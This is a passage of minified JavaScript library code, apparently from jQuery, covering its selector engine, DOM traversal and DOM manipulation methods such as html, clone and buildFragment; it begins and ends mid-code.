n.push(o),n}else if(t.ownerDocument&&(o=t.ownerDocument.getElementById(a))&&y(t,o)&&o.id===a)return n.push(o),n}else{if(i[2])return H.apply(n,q.call(t.getElementsByTagName(e),0)),n;if((a=i[3])&&T.getByClassName&&t.getElementsByClassName)return H.apply(n,q.call(t.getElementsByClassName(a),0)),n}if(T.qsa&&!h.test(e)){if(f=!0,g=x,m=t,v=9===s&&e,1===s&&"object"!==t.nodeName.toLowerCase()){l=ft(e),(f=t.getAttribute("id"))?g=f.replace(K,"\\$&"):t.setAttribute("id",g),g="[id='"+g+"'] ",u=l.length;while(u--)l[u]=g+dt(l[u]);m=V.test(e)&&t.parentNode||t,v=l.join(",")}if(v)try{return H.apply(n,q.call(m.querySelectorAll(v),0)),n}catch(b){}finally{f||t.removeAttribute("id")}}}return wt(e.replace(W,"$1"),t,n,r)}a=st.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?"HTML"!==t.nodeName:!1},c=st.setDocument=function(e){var n=e?e.ownerDocument||e:w;return n!==p&&9===n.nodeType&&n.documentElement?(p=n,f=n.documentElement,d=a(n),T.tagNameNoComments=at(function(e){return e.appendChild(n.createComment("")),!e.getElementsByTagName("*").length}),T.attributes=at(function(e){e.innerHTML="<select></select>";var t=typeof e.lastChild.getAttribute("multiple");return"boolean"!==t&&"string"!==t}),T.getByClassName=at(function(e){return e.innerHTML="<div class='hidden e'></div><div class='hidden'></div>",e.getElementsByClassName&&e.getElementsByClassName("e").length?(e.lastChild.className="e",2===e.getElementsByClassName("e").length):!1}),T.getByName=at(function(e){e.id=x+0,e.innerHTML="<a name='"+x+"'></a><div name='"+x+"'></div>",f.insertBefore(e,f.firstChild);var t=n.getElementsByName&&n.getElementsByName(x).length===2+n.getElementsByName(x+0).length;return T.getIdNotName=!n.getElementById(x),f.removeChild(e),t}),i.attrHandle=at(function(e){return e.innerHTML="<a href='#'></a>",e.firstChild&&typeof e.firstChild.getAttribute!==A&&"#"===e.firstChild.getAttribute("href")})?{}:{href:function(e){return e.getAttribute("href",2)},type:function(e){return 
e.getAttribute("type")}},T.getIdNotName?(i.find.ID=function(e,t){if(typeof t.getElementById!==A&&!d){var n=t.getElementById(e);return n&&n.parentNode?[n]:[]}},i.filter.ID=function(e){var t=e.replace(et,tt);return function(e){return e.getAttribute("id")===t}}):(i.find.ID=function(e,n){if(typeof n.getElementById!==A&&!d){var r=n.getElementById(e);return r?r.id===e||typeof r.getAttributeNode!==A&&r.getAttributeNode("id").value===e?[r]:t:[]}},i.filter.ID=function(e){var t=e.replace(et,tt);return function(e){var n=typeof e.getAttributeNode!==A&&e.getAttributeNode("id");return n&&n.value===t}}),i.find.TAG=T.tagNameNoComments?function(e,n){return typeof n.getElementsByTagName!==A?n.getElementsByTagName(e):t}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},i.find.NAME=T.getByName&&function(e,n){return typeof n.getElementsByName!==A?n.getElementsByName(name):t},i.find.CLASS=T.getByClassName&&function(e,n){return typeof n.getElementsByClassName===A||d?t:n.getElementsByClassName(e)},g=[],h=[":focus"],(T.qsa=rt(n.querySelectorAll))&&(at(function(e){e.innerHTML="<select><option selected=''></option></select>",e.querySelectorAll("[selected]").length||h.push("\\["+_+"*(?:checked|disabled|ismap|multiple|readonly|selected|value)"),e.querySelectorAll(":checked").length||h.push(":checked")}),at(function(e){e.innerHTML="<input type='hidden' i=''/>",e.querySelectorAll("[i^='']").length&&h.push("[*^$]="+_+"*(?:\"\"|'')"),e.querySelectorAll(":enabled").length||h.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),h.push(",.*:")})),(T.matchesSelector=rt(m=f.matchesSelector||f.mozMatchesSelector||f.webkitMatchesSelector||f.oMatchesSelector||f.msMatchesSelector))&&at(function(e){T.disconnectedMatch=m.call(e,"div"),m.call(e,"[s!='']:x"),g.push("!=",R)}),h=RegExp(h.join("|")),g=RegExp(g.join("|")),y=rt(f.contains)||f.compareDocumentPosition?function(e,t){var 
n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},v=f.compareDocumentPosition?function(e,t){var r;return e===t?(u=!0,0):(r=t.compareDocumentPosition&&e.compareDocumentPosition&&e.compareDocumentPosition(t))?1&r||e.parentNode&&11===e.parentNode.nodeType?e===n||y(w,e)?-1:t===n||y(w,t)?1:0:4&r?-1:1:e.compareDocumentPosition?-1:1}:function(e,t){var r,i=0,o=e.parentNode,a=t.parentNode,s=[e],l=[t];if(e===t)return u=!0,0;if(!o||!a)return e===n?-1:t===n?1:o?-1:a?1:0;if(o===a)return ut(e,t);r=e;while(r=r.parentNode)s.unshift(r);r=t;while(r=r.parentNode)l.unshift(r);while(s[i]===l[i])i++;return i?ut(s[i],l[i]):s[i]===w?-1:l[i]===w?1:0},u=!1,[0,0].sort(v),T.detectDuplicates=u,p):p},st.matches=function(e,t){return st(e,null,null,t)},st.matchesSelector=function(e,t){if((e.ownerDocument||e)!==p&&c(e),t=t.replace(Z,"='$1']"),!(!T.matchesSelector||d||g&&g.test(t)||h.test(t)))try{var n=m.call(e,t);if(n||T.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(r){}return st(t,p,null,[e]).length>0},st.contains=function(e,t){return(e.ownerDocument||e)!==p&&c(e),y(e,t)},st.attr=function(e,t){var n;return(e.ownerDocument||e)!==p&&c(e),d||(t=t.toLowerCase()),(n=i.attrHandle[t])?n(e):d||T.attributes?e.getAttribute(t):((n=e.getAttributeNode(t))||e.getAttribute(t))&&e[t]===!0?t:n&&n.specified?n.value:null},st.error=function(e){throw Error("Syntax error, unrecognized expression: "+e)},st.uniqueSort=function(e){var t,n=[],r=1,i=0;if(u=!T.detectDuplicates,e.sort(v),u){for(;t=e[r];r++)t===e[r-1]&&(i=n.push(r));while(i--)e.splice(n[i],1)}return e};function ut(e,t){var n=t&&e,r=n&&(~t.sourceIndex||j)-(~e.sourceIndex||j);if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function lt(e){return function(t){var 
n=t.nodeName.toLowerCase();return"input"===n&&t.type===e}}function ct(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function pt(e){return ot(function(t){return t=+t,ot(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}o=st.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=o(e)}else if(3===i||4===i)return e.nodeValue}else for(;t=e[r];r++)n+=o(t);return n},i=st.selectors={cacheLength:50,createPseudo:ot,match:U,find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(et,tt),e[3]=(e[4]||e[5]||"").replace(et,tt),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||st.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&st.error(e[0]),e},PSEUDO:function(e){var t,n=!e[5]&&e[2];return U.CHILD.test(e[0])?null:(e[4]?e[2]=e[4]:n&&z.test(n)&&(t=ft(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){return"*"===e?function(){return!0}:(e=e.replace(et,tt).toLowerCase(),function(t){return t.nodeName&&t.nodeName.toLowerCase()===e})},CLASS:function(e){var t=k[e+" "];return t||(t=RegExp("(^|"+_+")"+e+"("+_+"|$)"))&&k(e,function(e){return t.test(e.className||typeof e.getAttribute!==A&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=st.attr(r,e);return null==i?"!="===t:t?(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i+" 
").indexOf(n)>-1:"|="===t?i===n||i.slice(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,u){var l,c,p,f,d,h,g=o!==a?"nextSibling":"previousSibling",m=t.parentNode,y=s&&t.nodeName.toLowerCase(),v=!u&&!s;if(m){if(o){while(g){p=t;while(p=p[g])if(s?p.nodeName.toLowerCase()===y:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?m.firstChild:m.lastChild],a&&v){c=m[x]||(m[x]={}),l=c[e]||[],d=l[0]===N&&l[1],f=l[0]===N&&l[2],p=d&&m.childNodes[d];while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if(1===p.nodeType&&++f&&p===t){c[e]=[N,d,f];break}}else if(v&&(l=(t[x]||(t[x]={}))[e])&&l[0]===N)f=l[1];else while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if((s?p.nodeName.toLowerCase()===y:1===p.nodeType)&&++f&&(v&&((p[x]||(p[x]={}))[e]=[N,f]),p===t))break;return f-=i,f===r||0===f%r&&f/r>=0}}},PSEUDO:function(e,t){var n,r=i.pseudos[e]||i.setFilters[e.toLowerCase()]||st.error("unsupported pseudo: "+e);return r[x]?r(t):r.length>1?(n=[e,e,"",t],i.setFilters.hasOwnProperty(e.toLowerCase())?ot(function(e,n){var i,o=r(e,t),a=o.length;while(a--)i=M.call(e,o[a]),e[i]=!(n[i]=o[a])}):function(e){return r(e,0,n)}):r}},pseudos:{not:ot(function(e){var t=[],n=[],r=s(e.replace(W,"$1"));return r[x]?ot(function(e,t,n,i){var o,a=r(e,null,i,[]),s=e.length;while(s--)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),!n.pop()}}),has:ot(function(e){return function(t){return st(e,t).length>0}}),contains:ot(function(e){return function(t){return(t.textContent||t.innerText||o(t)).indexOf(e)>-1}}),lang:ot(function(e){return X.test(e||"")||st.error("unsupported lang: "+e),e=e.replace(et,tt).toLowerCase(),function(t){var n;do if(n=d?t.getAttribute("xml:lang")||t.getAttribute("lang"):t.lang)return n=n.toLowerCase(),n===e||0===n.indexOf(e+"-");while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var 
n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===f},focus:function(e){return e===p.activeElement&&(!p.hasFocus||p.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeName>"@"||3===e.nodeType||4===e.nodeType)return!1;return!0},parent:function(e){return!i.pseudos.empty(e)},header:function(e){return Q.test(e.nodeName)},input:function(e){return G.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||t.toLowerCase()===e.type)},first:pt(function(){return[0]}),last:pt(function(e,t){return[t-1]}),eq:pt(function(e,t,n){return[0>n?n+t:n]}),even:pt(function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:pt(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:pt(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:pt(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;)e.push(r);return e})}};for(n in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})i.pseudos[n]=lt(n);for(n in{submit:!0,reset:!0})i.pseudos[n]=ct(n);function ft(e,t){var n,r,o,a,s,u,l,c=E[e+" "];if(c)return t?0:c.slice(0);s=e,u=[],l=i.preFilter;while(s){(!n||(r=$.exec(s)))&&(r&&(s=s.slice(r[0].length)||s),u.push(o=[])),n=!1,(r=I.exec(s))&&(n=r.shift(),o.push({value:n,type:r[0].replace(W," ")}),s=s.slice(n.length));for(a in i.filter)!(r=U[a].exec(s))||l[a]&&!(r=l[a](r))||(n=r.shift(),o.push({value:n,type:a,matches:r}),s=s.slice(n.length));if(!n)break}return t?s.length:s?st.error(e):E(e,u).slice(0)}function dt(e){var 
t=0,n=e.length,r="";for(;n>t;t++)r+=e[t].value;return r}function ht(e,t,n){var i=t.dir,o=n&&"parentNode"===i,a=C++;return t.first?function(t,n,r){while(t=t[i])if(1===t.nodeType||o)return e(t,n,r)}:function(t,n,s){var u,l,c,p=N+" "+a;if(s){while(t=t[i])if((1===t.nodeType||o)&&e(t,n,s))return!0}else while(t=t[i])if(1===t.nodeType||o)if(c=t[x]||(t[x]={}),(l=c[i])&&l[0]===p){if((u=l[1])===!0||u===r)return u===!0}else if(l=c[i]=[p],l[1]=e(t,n,s)||r,l[1]===!0)return!0}}function gt(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function mt(e,t,n,r,i){var o,a=[],s=0,u=e.length,l=null!=t;for(;u>s;s++)(o=e[s])&&(!n||n(o,r,i))&&(a.push(o),l&&t.push(s));return a}function yt(e,t,n,r,i,o){return r&&!r[x]&&(r=yt(r)),i&&!i[x]&&(i=yt(i,o)),ot(function(o,a,s,u){var l,c,p,f=[],d=[],h=a.length,g=o||xt(t||"*",s.nodeType?[s]:s,[]),m=!e||!o&&t?g:mt(g,f,e,s,u),y=n?i||(o?e:h||r)?[]:a:m;if(n&&n(m,y,s,u),r){l=mt(y,d),r(l,[],s,u),c=l.length;while(c--)(p=l[c])&&(y[d[c]]=!(m[d[c]]=p))}if(o){if(i||e){if(i){l=[],c=y.length;while(c--)(p=y[c])&&l.push(m[c]=p);i(null,y=[],l,u)}c=y.length;while(c--)(p=y[c])&&(l=i?M.call(o,p):f[c])>-1&&(o[l]=!(a[l]=p))}}else y=mt(y===a?y.splice(h,y.length):y),i?i(null,a,y,u):H.apply(a,y)})}function vt(e){var t,n,r,o=e.length,a=i.relative[e[0].type],s=a||i.relative[" "],u=a?1:0,c=ht(function(e){return e===t},s,!0),p=ht(function(e){return M.call(t,e)>-1},s,!0),f=[function(e,n,r){return!a&&(r||n!==l)||((t=n).nodeType?c(e,n,r):p(e,n,r))}];for(;o>u;u++)if(n=i.relative[e[u].type])f=[ht(gt(f),n)];else{if(n=i.filter[e[u].type].apply(null,e[u].matches),n[x]){for(r=++u;o>r;r++)if(i.relative[e[r].type])break;return yt(u>1&&gt(f),u>1&&dt(e.slice(0,u-1)).replace(W,"$1"),n,r>u&&vt(e.slice(u,r)),o>r&&vt(e=e.slice(r)),o>r&&dt(e))}f.push(n)}return gt(f)}function bt(e,t){var n=0,o=t.length>0,a=e.length>0,s=function(s,u,c,f,d){var 
h,g,m,y=[],v=0,b="0",x=s&&[],w=null!=d,T=l,C=s||a&&i.find.TAG("*",d&&u.parentNode||u),k=N+=null==T?1:Math.random()||.1;for(w&&(l=u!==p&&u,r=n);null!=(h=C[b]);b++){if(a&&h){g=0;while(m=e[g++])if(m(h,u,c)){f.push(h);break}w&&(N=k,r=++n)}o&&((h=!m&&h)&&v--,s&&x.push(h))}if(v+=b,o&&b!==v){g=0;while(m=t[g++])m(x,y,u,c);if(s){if(v>0)while(b--)x[b]||y[b]||(y[b]=L.call(f));y=mt(y)}H.apply(f,y),w&&!s&&y.length>0&&v+t.length>1&&st.uniqueSort(f)}return w&&(N=k,l=T),x};return o?ot(s):s}s=st.compile=function(e,t){var n,r=[],i=[],o=S[e+" "];if(!o){t||(t=ft(e)),n=t.length;while(n--)o=vt(t[n]),o[x]?r.push(o):i.push(o);o=S(e,bt(i,r))}return o};function xt(e,t,n){var r=0,i=t.length;for(;i>r;r++)st(e,t[r],n);return n}function wt(e,t,n,r){var o,a,u,l,c,p=ft(e);if(!r&&1===p.length){if(a=p[0]=p[0].slice(0),a.length>2&&"ID"===(u=a[0]).type&&9===t.nodeType&&!d&&i.relative[a[1].type]){if(t=i.find.ID(u.matches[0].replace(et,tt),t)[0],!t)return n;e=e.slice(a.shift().value.length)}o=U.needsContext.test(e)?0:a.length;while(o--){if(u=a[o],i.relative[l=u.type])break;if((c=i.find[l])&&(r=c(u.matches[0].replace(et,tt),V.test(a[0].type)&&t.parentNode||t))){if(a.splice(o,1),e=r.length&&dt(a),!e)return H.apply(n,q.call(r,0)),n;break}}}return s(e,p)(r,t,d,n,V.test(e)),n}i.pseudos.nth=i.pseudos.eq;function Tt(){}i.filters=Tt.prototype=i.pseudos,i.setFilters=new Tt,c(),st.attr=b.attr,b.find=st,b.expr=st.selectors,b.expr[":"]=b.expr.pseudos,b.unique=st.uniqueSort,b.text=st.getText,b.isXMLDoc=st.isXML,b.contains=st.contains}(e);var at=/Until$/,st=/^(?:parents|prev(?:Until|All))/,ut=/^.[^:#\[\.,]*$/,lt=b.expr.match.needsContext,ct={children:!0,contents:!0,next:!0,prev:!0};b.fn.extend({find:function(e){var t,n,r,i=this.length;if("string"!=typeof e)return r=this,this.pushStack(b(e).filter(function(){for(t=0;i>t;t++)if(b.contains(r[t],this))return!0}));for(n=[],t=0;i>t;t++)b.find(e,this[t],n);return n=this.pushStack(i>1?b.unique(n):n),n.selector=(this.selector?this.selector+" ":"")+e,n},has:function(e){var 
t,n=b(e,this),r=n.length;return this.filter(function(){for(t=0;r>t;t++)if(b.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(ft(this,e,!1))},filter:function(e){return this.pushStack(ft(this,e,!0))},is:function(e){return!!e&&("string"==typeof e?lt.test(e)?b(e,this.context).index(this[0])>=0:b.filter(e,this).length>0:this.filter(e).length>0)},closest:function(e,t){var n,r=0,i=this.length,o=[],a=lt.test(e)||"string"!=typeof e?b(e,t||this.context):0;for(;i>r;r++){n=this[r];while(n&&n.ownerDocument&&n!==t&&11!==n.nodeType){if(a?a.index(n)>-1:b.find.matchesSelector(n,e)){o.push(n);break}n=n.parentNode}}return this.pushStack(o.length>1?b.unique(o):o)},index:function(e){return e?"string"==typeof e?b.inArray(this[0],b(e)):b.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){var n="string"==typeof e?b(e,t):b.makeArray(e&&e.nodeType?[e]:e),r=b.merge(this.get(),n);return this.pushStack(b.unique(r))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}}),b.fn.andSelf=b.fn.addBack;function pt(e,t){do e=e[t];while(e&&1!==e.nodeType);return e}b.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return b.dir(e,"parentNode")},parentsUntil:function(e,t,n){return b.dir(e,"parentNode",n)},next:function(e){return pt(e,"nextSibling")},prev:function(e){return pt(e,"previousSibling")},nextAll:function(e){return b.dir(e,"nextSibling")},prevAll:function(e){return b.dir(e,"previousSibling")},nextUntil:function(e,t,n){return b.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return b.dir(e,"previousSibling",n)},siblings:function(e){return b.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return b.sibling(e.firstChild)},contents:function(e){return b.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:b.merge([],e.childNodes)}},function(e,t){b.fn[e]=function(n,r){var i=b.map(this,t,n);return 
at.test(e)||(r=n),r&&"string"==typeof r&&(i=b.filter(r,i)),i=this.length>1&&!ct[e]?b.unique(i):i,this.length>1&&st.test(e)&&(i=i.reverse()),this.pushStack(i)}}),b.extend({filter:function(e,t,n){return n&&(e=":not("+e+")"),1===t.length?b.find.matchesSelector(t[0],e)?[t[0]]:[]:b.find.matches(e,t)},dir:function(e,n,r){var i=[],o=e[n];while(o&&9!==o.nodeType&&(r===t||1!==o.nodeType||!b(o).is(r)))1===o.nodeType&&i.push(o),o=o[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n}});function ft(e,t,n){if(t=t||0,b.isFunction(t))return b.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return b.grep(e,function(e){return e===t===n});if("string"==typeof t){var r=b.grep(e,function(e){return 1===e.nodeType});if(ut.test(t))return b.filter(t,r,!n);t=b.filter(t,r)}return b.grep(e,function(e){return b.inArray(e,t)>=0===n})}function dt(e){var t=ht.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}var ht="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",gt=/ jQuery\d+="(?:null|\d+)"/g,mt=RegExp("<(?:"+ht+")[\\s/>]","i"),yt=/^\s+/,vt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,bt=/<([\w:]+)/,xt=/<tbody/i,wt=/<|&#?\w+;/,Tt=/<(?:script|style|link)/i,Nt=/^(?:checkbox|radio)$/i,Ct=/checked\s*(?:[^=]|=\s*.checked.)/i,kt=/^$|\/(?:java|ecma)script/i,Et=/^true\/(.*)/,St=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,At={option:[1,"<select 
multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:b.support.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},jt=dt(o),Dt=jt.appendChild(o.createElement("div"));At.optgroup=At.option,At.tbody=At.tfoot=At.colgroup=At.caption=At.thead,At.th=At.td,b.fn.extend({text:function(e){return b.access(this,function(e){return e===t?b.text(this):this.empty().append((this[0]&&this[0].ownerDocument||o).createTextNode(e))},null,e,arguments.length)},wrapAll:function(e){if(b.isFunction(e))return this.each(function(t){b(this).wrapAll(e.call(this,t))});if(this[0]){var t=b(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&1===e.firstChild.nodeType)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return b.isFunction(e)?this.each(function(t){b(this).wrapInner(e.call(this,t))}):this.each(function(){var t=b(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=b.isFunction(e);return this.each(function(n){b(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){b.nodeName(this,"body")||b(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(e){(1===this.nodeType||11===this.nodeType||9===this.nodeType)&&this.appendChild(e)})},prepend:function(){return this.domManip(arguments,!0,function(e){(1===this.nodeType||11===this.nodeType||9===this.nodeType)&&this.insertBefore(e,this.firstChild)})},before:function(){return this.domManip(arguments,!1,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return 
this.domManip(arguments,!1,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},remove:function(e,t){var n,r=0;for(;null!=(n=this[r]);r++)(!e||b.filter(e,[n]).length>0)&&(t||1!==n.nodeType||b.cleanData(Ot(n)),n.parentNode&&(t&&b.contains(n.ownerDocument,n)&&Mt(Ot(n,"script")),n.parentNode.removeChild(n)));return this},empty:function(){var e,t=0;for(;null!=(e=this[t]);t++){1===e.nodeType&&b.cleanData(Ot(e,!1));while(e.firstChild)e.removeChild(e.firstChild);e.options&&b.nodeName(e,"select")&&(e.options.length=0)}return this},clone:function(e,t){return e=null==e?!1:e,t=null==t?e:t,this.map(function(){return b.clone(this,e,t)})},html:function(e){return b.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return 1===n.nodeType?n.innerHTML.replace(gt,""):t;if(!("string"!=typeof e||Tt.test(e)||!b.support.htmlSerialize&&mt.test(e)||!b.support.leadingWhitespace&&yt.test(e)||At[(bt.exec(e)||["",""])[1].toLowerCase()])){e=e.replace(vt,"<$1></$2>");try{for(;i>r;r++)n=this[r]||{},1===n.nodeType&&(b.cleanData(Ot(n,!1)),n.innerHTML=e);n=0}catch(o){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(e){var t=b.isFunction(e);return t||"string"==typeof e||(e=b(e).not(this).detach()),this.domManip([e],!0,function(e){var t=this.nextSibling,n=this.parentNode;n&&(b(this).remove(),n.insertBefore(e,t))})},detach:function(e){return this.remove(e,!0)},domManip:function(e,n,r){e=f.apply([],e);var i,o,a,s,u,l,c=0,p=this.length,d=this,h=p-1,g=e[0],m=b.isFunction(g);if(m||!(1>=p||"string"!=typeof g||b.support.checkClone)&&Ct.test(g))return this.each(function(i){var 
o=d.eq(i);m&&(e[0]=g.call(this,i,n?o.html():t)),o.domManip(e,n,r)});if(p&&(l=b.buildFragment(e,this[0].ownerDocument,!1,this),i=l.firstChild,1===l.childNodes.length&&(l=i),i)){for(n=n&&b.nodeName(i,"tr"),s=b.map(Ot(l,"script"),Ht),a=s.length;p>c;c++)o=l,c!==h&&(o=b.clone(o,!0,!0),a&&b.merge(s,Ot(o,"script"))),r.call(n&&b.nodeName(this[c],"table")?Lt(this[c],"tbody"):this[c],o,c);if(a)for(u=s[s.length-1].ownerDocument,b.map(s,qt),c=0;a>c;c++)o=s[c],kt.test(o.type||"")&&!b._data(o,"globalEval")&&b.contains(u,o)&&(o.src?b.ajax({url:o.src,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0}):b.globalEval((o.text||o.textContent||o.innerHTML||"").replace(St,"")));l=i=null}return this}});function Lt(e,t){return e.getElementsByTagName(t)[0]||e.appendChild(e.ownerDocument.createElement(t))}function Ht(e){var t=e.getAttributeNode("type");return e.type=(t&&t.specified)+"/"+e.type,e}function qt(e){var t=Et.exec(e.type);return t?e.type=t[1]:e.removeAttribute("type"),e}function Mt(e,t){var n,r=0;for(;null!=(n=e[r]);r++)b._data(n,"globalEval",!t||b._data(t[r],"globalEval"))}function _t(e,t){if(1===t.nodeType&&b.hasData(e)){var n,r,i,o=b._data(e),a=b._data(t,o),s=o.events;if(s){delete a.handle,a.events={};for(n in s)for(r=0,i=s[n].length;i>r;r++)b.event.add(t,n,s[n][r])}a.data&&(a.data=b.extend({},a.data))}}function Ft(e,t){var n,r,i;if(1===t.nodeType){if(n=t.nodeName.toLowerCase(),!b.support.noCloneEvent&&t[b.expando]){i=b._data(t);for(r in 
i.events)b.removeEvent(t,r,i.handle);t.removeAttribute(b.expando)}"script"===n&&t.text!==e.text?(Ht(t).text=e.text,qt(t)):"object"===n?(t.parentNode&&(t.outerHTML=e.outerHTML),b.support.html5Clone&&e.innerHTML&&!b.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):"input"===n&&Nt.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):"option"===n?t.defaultSelected=t.selected=e.defaultSelected:("input"===n||"textarea"===n)&&(t.defaultValue=e.defaultValue)}}b.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){b.fn[e]=function(e){var n,r=0,i=[],o=b(e),a=o.length-1;for(;a>=r;r++)n=r===a?this:this.clone(!0),b(o[r])[t](n),d.apply(i,n.get());return this.pushStack(i)}});function Ot(e,n){var r,o,a=0,s=typeof e.getElementsByTagName!==i?e.getElementsByTagName(n||"*"):typeof e.querySelectorAll!==i?e.querySelectorAll(n||"*"):t;if(!s)for(s=[],r=e.childNodes||e;null!=(o=r[a]);a++)!n||b.nodeName(o,n)?s.push(o):b.merge(s,Ot(o,n));return n===t||n&&b.nodeName(e,n)?b.merge([e],s):s}function Bt(e){Nt.test(e.type)&&(e.defaultChecked=e.checked)}b.extend({clone:function(e,t,n){var r,i,o,a,s,u=b.contains(e.ownerDocument,e);if(b.support.html5Clone||b.isXMLDoc(e)||!mt.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(Dt.innerHTML=e.outerHTML,Dt.removeChild(o=Dt.firstChild)),!(b.support.noCloneEvent&&b.support.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||b.isXMLDoc(e)))for(r=Ot(o),s=Ot(e),a=0;null!=(i=s[a]);++a)r[a]&&Ft(i,r[a]);if(t)if(n)for(s=s||Ot(e),r=r||Ot(o),a=0;null!=(i=s[a]);a++)_t(i,r[a]);else _t(e,o);return r=Ot(o,"script"),r.length>0&&Mt(r,!u&&Ot(e,"script")),r=s=i=null,o},buildFragment:function(e,t,n,r){var i,o,a,s,u,l,c,p=e.length,f=dt(t),d=[],h=0;for(;p>h;h++)if(o=e[h],o||0===o)if("object"===b.type(o))b.merge(d,o.nodeType?[o]:o);else 
